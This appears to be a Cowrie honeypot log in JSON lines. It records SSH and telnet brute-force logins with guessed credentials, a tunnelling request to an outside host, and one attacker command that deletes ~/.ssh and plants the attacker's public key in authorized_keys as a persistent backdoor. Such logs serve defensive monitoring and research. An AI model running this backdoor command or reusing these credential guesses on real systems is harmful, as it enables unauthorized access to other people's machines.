{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:04:45.368470Z","src_ip":"212.227.235.229","session":"17aca3b53244"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"pass","message":"login attempt [vpn/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T07:04:46.379348Z","src_ip":"212.227.235.229","session":"17aca3b53244"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:04:47.624629Z","src_ip":"212.227.235.229","session":"17aca3b53244"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48884,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a24f9067ce6","protocol":"telnet","message":"New connection: 212.227.125.160:48884 (1.2.3.4:23) [session: 0a24f9067ce6]","sensor":"my-vps","timestamp":"2025-09-09T07:05:24.682441Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":35502,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dc10f61e48f","protocol":"ssh","message":"New connection: 92.118.39.62:35502 (1.2.3.4:22) [session: 9dc10f61e48f]","sensor":"my-vps","timestamp":"2025-09-09T07:05:25.518041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:05:25.518839Z","src_ip":"92.118.39.62","session":"9dc10f61e48f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:05:25.548878Z","src_ip":"92.118.39.62","session":"9dc10f61e48f"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay1234","message":"login attempt [clay/clay1234] failed","sensor":"my-vps","timestamp":"2025-09-09T07:05:25.640907Z","src_ip":"92.118.39.62","session":"9dc10f61e48f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:05:26.673132Z","src_ip":"92.118.39.62","session":"9dc10f61e48f"}
{"eventid":"cowrie.session.closed","duration":13.287437438964844,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:05:37.969780Z","src_ip":"212.227.125.160","session":"0a24f9067ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33073,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d7cb0899c8","protocol":"ssh","message":"New connection: 212.227.235.229:33073 (1.2.3.4:22) [session: d3d7cb0899c8]","sensor":"my-vps","timestamp":"2025-09-09T07:06:00.866038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:06:00.866732Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:06:01.109999Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.login.success","username":"root","password":"format12","message":"login attempt [root/format12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:06:02.123480Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:06:02.667684Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:06:02.668366Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:06:02.669218Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:02.913435Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:06:03.418215Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:06:03.418918Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:06:03.664135Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:03.665113Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33662,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b7f8f00c49","protocol":"ssh","message":"New connection: 212.227.235.229:33662 (1.2.3.4:22) [session: a2b7f8f00c49]","sensor":"my-vps","timestamp":"2025-09-09T07:06:03.905180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:06:03.906079Z","src_ip":"212.227.235.229","session":"a2b7f8f00c49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:06:04.148800Z","src_ip":"212.227.235.229","session":"a2b7f8f00c49"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:06:05.167499Z","src_ip":"212.227.235.229","session":"a2b7f8f00c49"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:06.412417Z","src_ip":"212.227.235.229","session":"a2b7f8f00c49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34096,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e65c0bb28de","protocol":"ssh","message":"New connection: 212.227.235.229:34096 (1.2.3.4:22) [session: 5e65c0bb28de]","sensor":"my-vps","timestamp":"2025-09-09T07:06:06.655836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:06:06.656633Z","src_ip":"212.227.235.229","session":"5e65c0bb28de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:06:06.899544Z","src_ip":"212.227.235.229","session":"5e65c0bb28de"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:06:07.873946Z","src_ip":"212.227.235.229","session":"5e65c0bb28de"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:08.118972Z","src_ip":"212.227.235.229","session":"d3d7cb0899c8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:08.119951Z","src_ip":"212.227.235.229","session":"5e65c0bb28de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40035,"dst_ip":"1.2.3.4","dst_port":22,"session":"77131ec84375","protocol":"ssh","message":"New connection: 212.227.125.160:40035 (1.2.3.4:22) [session: 77131ec84375]","sensor":"my-vps","timestamp":"2025-09-09T07:06:33.464767Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:06:33.466238Z","src_ip":"212.227.125.160","session":"77131ec84375"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40296,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbe349e06e78","protocol":"ssh","message":"New connection: 212.227.125.160:40296 (1.2.3.4:22) [session: fbe349e06e78]","sensor":"my-vps","timestamp":"2025-09-09T07:06:33.573082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:06:33.574396Z","src_ip":"212.227.125.160","session":"fbe349e06e78"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T07:06:33.685654Z","src_ip":"212.227.125.160","session":"fbe349e06e78"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:06:34.021303Z","src_ip":"212.227.125.160","session":"fbe349e06e78"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T07:06:34.135534Z","session":"fbe349e06e78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56138,"dst_ip":"1.2.3.4","dst_port":23,"session":"59c594e32127","protocol":"telnet","message":"New connection: 212.227.125.160:56138 (1.2.3.4:23) [session: 59c594e32127]","sensor":"my-vps","timestamp":"2025-09-09T07:06:50.684508Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:06:50.767942Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:06:50.818178Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T07:06:50.819994Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T07:06:50.821596Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45935,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f0f7c2492b9","protocol":"ssh","message":"New connection: 212.227.235.229:45935 (1.2.3.4:22) [session: 0f0f7c2492b9]","sensor":"my-vps","timestamp":"2025-09-09T07:07:17.420018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:07:17.421045Z","src_ip":"212.227.235.229","session":"0f0f7c2492b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:07:17.663619Z","src_ip":"212.227.235.229","session":"0f0f7c2492b9"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T07:07:18.677109Z","src_ip":"212.227.235.229","session":"0f0f7c2492b9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:07:19.922300Z","src_ip":"212.227.235.229","session":"0f0f7c2492b9"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:07:43.573999Z","src_ip":"212.227.125.160","session":"fbe349e06e78"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61220,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b75ec764234","protocol":"ssh","message":"New connection: 217.72.205.35:61220 (1.2.3.4:22) [session: 1b75ec764234]","sensor":"my-vps","timestamp":"2025-09-09T07:08:10.816627Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:10.817693Z","src_ip":"217.72.205.35","session":"1b75ec764234"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58800,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2dfe1216fb1","protocol":"ssh","message":"New connection: 212.227.235.229:58800 (1.2.3.4:22) [session: e2dfe1216fb1]","sensor":"my-vps","timestamp":"2025-09-09T07:08:31.963194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:08:31.964705Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:08:32.207861Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.login.success","username":"root","password":"9ol.0p;/","message":"login attempt [root/9ol.0p;/] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:08:33.222705Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
